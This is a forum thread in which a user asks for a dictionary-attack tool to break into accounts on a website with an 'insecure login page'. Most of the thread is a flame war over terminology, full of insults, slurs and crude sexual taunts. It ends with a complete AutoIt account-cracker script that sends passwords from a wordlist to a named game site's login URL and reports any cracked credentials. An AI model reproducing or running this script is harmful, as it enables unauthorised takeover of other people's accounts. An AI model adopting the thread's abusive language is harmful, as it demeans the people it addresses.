Writing a dictionary-based brute-forcer?

[323]

Hey guys.

I need to quickly write up a dictionary-based bruteforcer, I found a website with an insecure login page.

Could I do this in a macro, or do I have to write a program?

Or does anyone have a source where I could just put in the URL and the id's of the username and password box and the name of the text file and just use that?

Thanks.

[GAMEchief]

ur dum

go awway

[323]

ur dum

go awway

And how does asking how to write something make me dumb? Please, explain.

[GAMEchief]

bcuz wat u r riting is dumb n if u new how to program like u need 2 no 2 rite it u wuldnt have 2 ask

[The Unintelligible]

First and foremost: why isn't this in the Programming section or somewhere else related?

I need to quickly write up a dictionary-based bruteforcer, I found a website with an insecure login page.

Bruteforcing and Dictionary Attacks are two different mechanisms. If you're writing a cracker (correct terminology) that utilizes a dictionary or password list it's commonly referred to as a Dictionary Attack. If you're using raw keywords systematically (e.g., 123456, 1234567, etc.) then it's commonly known as a Bruteforce Attack.

So, which is it? Keep in mind that ubiquitously the simpler (and in a vast majority of cases more effective) approach would be the dictionary route.

Could I do this in a macro, or do I have to write a program?

The latter would be generally good taste, but the former is also feasible provided you have the resources.

Or does anyone have a source where I could just put in the URL and the id's of the username and password box and the name of the text file and just use that?

Yes, and no.

[GAMEchief]

Pretty sure "crackers" are a subcategory of brute forcer. A brute forcer is anything that berates a server with various combinations of a username and passwords in an attempt to find the correct password for the account. That includes dictionary attacks.

[323]

Pretty sure "crackers" are a subcategory of brute forcer. A brute forcer is anything that berates a server with various combinations of a username and passwords in an attempt to find the correct password for the account. That includes dictionary attacks.

This is true. Also, I do know how to program, but why program one myself if I can just use someone else's that's probably better?

@The UnIntelligible: Yeah yeah, I know that.

[The Unintelligible]

Pretty sure "crackers" are a subcategory of brute forcer. A brute forcer is anything that berates a server with various combinations of a username and passwords in an attempt to find the correct password for the account. That includes dictionary attacks.

You're wrong.

Bruteforcing is a subcategory mechanism of the actual process of cracking. There's a fine-line between dictionary attacks and bruteforce attacks (exhaustive key search)—both fall within the category of the concept Cracking.

This is true.

See above.

Also, I do know how to program, but why program one myself if I can just use someone else's that's probably better?

I've already explained this to you. And to an extent, your friend GAMEchief did, too-

The latter would be generally good taste

@The UnIntelligible: Yeah yeah, I know that.

No you don't. Otherwise this thread wouldn't exist.

[GAMEchief]

You're wrong.

Bruteforcing is a subcategory mechanism of the actual process of cracking. There's a fine-line between dictionary attacks and bruteforce attacks (exhaustive key search)—both fall within the category of the concept Cracking.

No shit. I misread what you wrote, and was using cracker incorrectly, as I read you as having written "a cracker is a dictionary attack" as opposed to "a cracker that uses a dictionary attack." I was using it that way to make it easier for you to understand, but my mistake for reading it wrong.

Crackers > Brute Forcers > Dictionary Attacks

Dictionary attacks are still brute forcers.

[The Unintelligible]

No shit. I misread what you wrote, and was using cracker incorrectly

All of this is obvious. And I personally think your entire post was just an attempt to justify your initial mistake—misread or not.

Dictionary attacks are still brute forcers.

Dictionary attacks are not Bruteforcers. People usually address it as such because it's used idiomatically rather than technically for simplicity purposes.

[GAMEchief]

All of this is obvious. And I personally think your entire post was just an attempt to justify your initial mistake—misread or not.

You're retarded.

Dictionary attacks are not Bruteforcers.

Yes they are. Especially when you are brute forcing with them, like OP intends. You know, that being what brute forcers do. Brute force and all.

[The Unintelligible]

You're retarded.

For stating a fact I'm the retard here. Okay. You were originally wrong (you still are). You tried to justify your ignorant mistake. And I called you out accordingly. As simple as that.

Yes they are. Especially when you are brute forcing with them, like OP intends. You know, that being what brute forcers do. Brute force and all.

Oh God. You're completely twisting the situation here.

I thought you would be able to admit you were wrong here; clearly you aren't.

P.S. You still don't know the difference between a bruteforcer and a dictionary attack.

[GAMEchief]

For stating a fact I'm the retard here. Okay. You were originally wrong (you still are). You tried to justify your ignorant mistake. And I called you out accordingly. As simple as that.

You are adorably serious.
Your perception of other people is concerning, though.

I did use cracker wrong, and I admitted that immediately. That's not an attempt to justify any mistake, as I certainly wouldn't say, "No, the answer isn't A. It's B." and later say it is "C" in an attempt to look less retarded when I know the answer is A. That doesn't make sense.
What does make sense is that you are retarded.

A dictionary attack is a brute forcer, because it uses brute force to crack. A brute forcer is a cracker because it cracks.
Hurr durr hurr. See how that logic works?

I didn't fall off the retard ship into basic reasoning after a matter of a single post, but if you want to argue that to make it look like what you are saying has any more ground, feel absolutely free. It doesn't change the fact that your definitions have been wrong from the start.

also u r dum as shit gb24chan u haxor w/ ur 1337 noledge
u r 2 kewl w ur gaia accounts i dunt feel safe heer plz jus go awway

[The Unintelligible]

You are adorably serious.
Your perception of other people is concerning, though.

Yeah, clearly I'm serious here for correcting one pseudo-intellectual clueless skiddy. This is hilarious. I can tell you're a little upset about being embarrassed now.

I did use cracker wrong, and I admitted that immediately. That's not an attempt to justify any mistake, as I certainly wouldn't say, "No, the answer isn't A. It's B." and later say it is "C" in an attempt to look less retarded when I know the answer is A. That doesn't make sense.
What does make sense is that you are retarded.

Your entire posts were incorrect, not only your usage of the term cracker. You tried to justify it because despite being wrong you still spewed nonsensical ramble.

What does make sense is that you are retarded.

I don't think someone who doesn't understand the distinction between bruteforcing and dictionary attacks is entitled to judge intelligence.

A dictionary attack is a brute forcer, because it uses brute force to crack. A brute forcer is a cracker because it cracks.
Hurr durr hurr. See how that logic works?

That isn't logic you idiot. Oh lord. This entire time I've been being lenient with you but this is just simply ridiculous.

A dictionary attack and bruteforce attack (bruteforcer) are methodically different things. They both fall within the spectrum of Cracking. A dictionary attack is not bruteforcing. Bruteforcing is not a dictionary attack. Both are mechanisms utilized by the concept or process of cracking in itself.

Do you understand how that logic works? (If you do that would seriously surprise me.)

I didn't fall off the retard ship into basic reasoning after a matter of a single post, but if you want to argue that to make it look like what you are saying has any more ground, feel absolutely free. It doesn't change the fact that your definitions have been wrong from the start.

What I'm saying does simply have more ground. But that's not very surprising considering I'm arguing with a non-programmer moron. And now you're contradicting yourself by saying my definitions are wrong when you've admittedly already said yours were wrong. Put aside the fact you still are wrong.

also u r dum as shit gb24chan u haxor w/ ur 1337 noledge

I like how what I say comes off as being some all-knowing omniscient being. I just simply know more than you. That's all there really is to it.

I'm not insinuating I'm some sort of God.

u r 2 kewl w ur gaia accounts i dunt feel safe heer plz jus go awway

And this is the person who insults others' intelligence. Classic.

Yeah, I think I'm done arguing with you here. It's very clear that you aren't playing with a full deck. My advice to you at this point is to stay in your lane and stop trying to discuss what you clearly don't know.

[GAMEchief]

I wish I could program. Then I could make things like crackers and brute forcers like you, but I'm stuck not knowing anything about these things, because I've never programmed a day in my life, or hacked anything ever. You are so much smarter than I am.

also retarded

[Ethan]

GAMEchief wins.

[GAMEchief]

Nah, bro, I throw the white flag. If only I knew how to program.

I'm arguing with a non-programmer moron.

I HAVE BEEN CALLED OUT AND I AM ASHAMED TO HAVE STEPPED OUT OF LINE AND TALKED ABOUT THINGS I KNOW NOTHING ABOUT.

I am too embarrassed to ever show my face here again.

[The Unintelligible]

GAMEchief wins.

This isn't a debate. If it were a debate he would lose because he resorted to ad-hominem when he was clearly wrong to begin with. If you don't know the subject matter in the first place please refrain from commenting.

GAMEchief was upset about how I corrected him because he tried to know what he clearly didn't.

Edit: He's no longer even arguing the original topic. He's downplaying the fact that he's lost the argument.

This is rich.

[GAMEchief]

This isn't a debate. If it were a debate he would lose because he resorted to ad-hominem when he was clearly wrong to begin with. If you don't know the subject matter in the first place please refrain from commenting.

GAMEchief was upset about how I corrected him because he tried to know what he clearly didn't.

Edit: He's no longer even arguing the original topic. He's downplaying the fact that he's lost the argument.

This is rich.

You are right about everything. This is me conceding, not downplaying. I couldn't be more wrong, and I shouldn't discuss subject matter of which I know nothing about. That was just foolish of me.
I am thinking of taking some classes on hacking. What would you recommend I start with? Windows? Intro to Hacking I? They have that right? Hopefully they teach how2hack Pentagon before I get my bachelors cuz i wnat to make lots of money as leet hacker like you are good at being and know all the things about, that I admitting is true.

lol ad hominem, you're retarded. l2not ad hominem from the start when accusing of ad hominem

I even put in signature so erryone nows im not programmer either.

[The Unintelligible]

You are right about everything. This is me conceding, not downplaying. I couldn't be more wrong, and I shouldn't discuss subject matter of which I know nothing about. That was just foolish of me.

I'm not right about everything, I admit that. I was exclusively right in this instance because I'm arguing with an idiot who had no idea what he was talking about.

I am thinking of taking some classes on hacking. What would you recommend I start with? Windows? Intro to Hacking I? They have that right? Hopefully they teach how2hack Pentagon before I get my bachelors cuz i wnat to make lots of money as leet hacker like you are good at being and know all the things about, that I admitting is true.

Exhibit A: Sarcastically rambling rather than offering a counterargument to the topic at hand.

LG is just full of idiots.

lol ad hominem, you're retarded

It's one word; not two, you idiot. Also you probably don't even understand the meaning of that word. It's also getting a bit ironic how someone who's exemplified how retarded he is is deeming others also retarded.

This thread made my day, it truly did.

[GAMEchief]

LG is just full of idiots.

go awway
ur brain is 2 big 4 us lgers
so big dat u cant eevn google answer 2 topic n ad hominem instead
is lyk ur god of noledge n talk

i want b lyk u soooo much wen i gro up

[The Unintelligible]

go awway
ur brain is 2 big 4 us lgers
so big dat u cant eevn google answer 2 topic n ad hominem instead
is lyk ur god of noledge n talk

i want b lyk u soooo much wen i gro up

GAMEchief, you know, I've been being lax with you this whole time, right? Not trying to insult you or anything, you were just wrong and you refused to admit such. That was your one core fallacy here.

I also don't mean to insult the entirety of LG. There are a few exceptions to my statement. There's Artificial, Coffincase, and probably a few others. Just certainly not you.

[GAMEchief]

I bet your penis is huge too.

The way you adamantly and incorrectly know such minute and useless information, but are way superior to people about it and super serious. If my vagina was functional, it would be so wet right now.

[The Unintelligible]

I bet your penis is huge too.

The way you adamantly and incorrectly know such minute and useless information, but are way superior to people about it and super serious. If my vagina was functional, it would be so wet right now.

Congratulations on using words incorrectly.

Anyway, guess this discussion is over.

[GAMEchief]

Mmm, your fallacies are delicious.

Mmm, yer falconry are decisions.

[The Unintelligible]

Mmm, your fallacies are delicious.

Mmm, yer falconry are decisions.

We aren't being serious anymore are we.

Ah well. This was fun while it lasted.

[Ethan]

Congratulations on using words incorrectly.

Anyway, guess this discussion is over.

You should silence yourself from this website.
This thread has shown how big of a disease you are and now you need to be quarantined.

[GAMEchief]

We aren't being serious anymore are we.

Ah well. This was fun while it lasted.

Those words are too small for me to autocorrect.

Like your pens.

[The Unintelligible]

Those words are too small for me to autocorrect.

Like your pens.

i think you mean penis.

anyway it would be nice to get to talk to you again. I might actually bother attempting to add you to MSN

[Ethan]

i think you mean penis.

anyway it would be nice to get to talk to you again. I might actual bother attempting to add you to MSN

Please remove your e-penis before you spawn more useless children.

[GAMEchief]

i think you mean penis.

OH GOD I MAE A TYPOs

[Ethan]

Once again, GAMEchief wins.

[The Unintelligible]

Topic: Flareboy323, found this laying around somewhere. Pretty old and fairly messy, but you might be able to modify it a bit to suit your needs:

Code:

; Made by Protozoid

#include <File.au3>
#include <Misc.au3>
;#include <MD5.au3>
;#include <Constants.au3>

Global Const $nullstring = ''
Global Const $apiURL = 'http://www.duelingnetwork.com:8080/Dueling_Network/login.do?'
Global Const $imageDir = @ScriptDir & '/minigfx.jpg'

Global $oHttp = ObjCreate("winhttp.winhttprequest.5.1"), $cracked, $counter, $resp

ObjEvent("AutoIt.Error", "ErrHandler")

;If _Singleton(@ScriptName) Then
	;MsgBox(16, "Error", "An instance of Mini-SAB Account Cracker already exists.")
	;Exit
;EndIf

HotKeySet('{Esc}', "Close")

;Splash()

While 1
	__Init__()
WEnd

Func Close()
	Exit
EndFunc   ;==>Close

Func Splash()
	SplashImageOn("", $imageDir, 500, 200, Default, Default, 1)
	Sleep(5700)
	SplashOff()
EndFunc   ;==>Splash

Func __Init__()
	$username = InputBox("Mini-SAB Account Cracker v1.1", "Enter the user you would like to 'hack' in the input below." & @CRLF & @CRLF & _
			"Press Cancel, click the red X, or Esc to exit.")
	If @error = 1 Then Exit
	$txt = FileOpenDialog("Choose passwords via Text file", @ScriptDir & "\", "Text Files (*.txt;*.text)", 1 + 4)
	If $txt <> '' Then MsgBox(64, "Cracking Session Started", "Now cracking user " & $username & '..', 2)
	Do
		For $i = 1 To _FileCountLines($txt)
			$password = FileReadLine($txt, $i)
			$resp = _Login($username, $password)
			$counter += 1
			If StringInStr($resp, "Logged in") Or StringInStr($resp, "banned") Then
				$cracked = True
				$choice = MsgBox(4, "Cracked", "User " & $username & " has been cracked!" & @CRLF & @CRLF & "Username: " & $username & @CRLF & "Password: " & $password & _
						@CRLF & @CRLF & "Copy user information to clipboard?")
				Switch $choice
					Case 6
						ClipPut("Username: " & $username & @CRLF & "Password: " & $password)
					Case 7
						MsgBox(16, "", "User information was not copied.")
				EndSwitch
				$choice = MsgBox(4, "", "Would you like to crack another user?")
				Switch $choice
					Case 6
						MsgBox(64, "", "OK, now returning to main frame..", 2)
					Case 7
						Exit
				EndSwitch
			EndIf
			If $cracked <> True And $i >= _FileCountLines($txt) Then MsgBox(16, "Failed", "User " & $username & " was not cracked.")
		Next
	Until $cracked = True Or $i >= _FileCountLines($txt)
EndFunc   ;==>__Init__

Func _HttpRequest($oHttp, $sMethod, $sURL, $sData = '', $sReferrer = '', $fKeep_alive = False, $sProxy = '')
	$oHttp.Open($sMethod, $sURL, False)
	$oHttp.SetRequestHeader("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 BTRS28059 Firefox/3.6.12 (.NET CLR 3.5.30729) SuperSearchSearchToolbar/1.2")
	If $fKeep_alive == True Then $oHttp.SetRequestHeader("Connection", "keep-alive")
	If $sReferrer = $nullstring Then $sReferrer = $sURL
	$oHttp.SetRequestHeader("Referrer", $sReferrer)
	If $sProxy <> $nullstring Then $oHttp.SetProxy(2, $sProxy)
	If $sMethod == "GET" Then
		$sData = $nullstring
	ElseIf $sMethod == "POST" Then
		$oHttp.SetRequestHeader("Content-Type", "application/x-www-form-urlencoded")
	Else
		Return "Invalid method specified."
	EndIf
	$oHttp.Send($sData)
	Return $oHttp.ResponseText
EndFunc   ;==>_HttpRequest

Func _Login($user, $pass)
	$Ret = _HttpRequest($oHttp, "GET", $apiURL & "username=" & $user & "&password=" & $pass)
	Return $Ret
EndFunc   ;==>_Login

Func ErrHandler()
	SetError(1)
	$oHttp = 0
	$oHttp = ObjCreate("winhttp.winhttprequest.5.1")
EndFunc   ;==>ErrHandle

Au3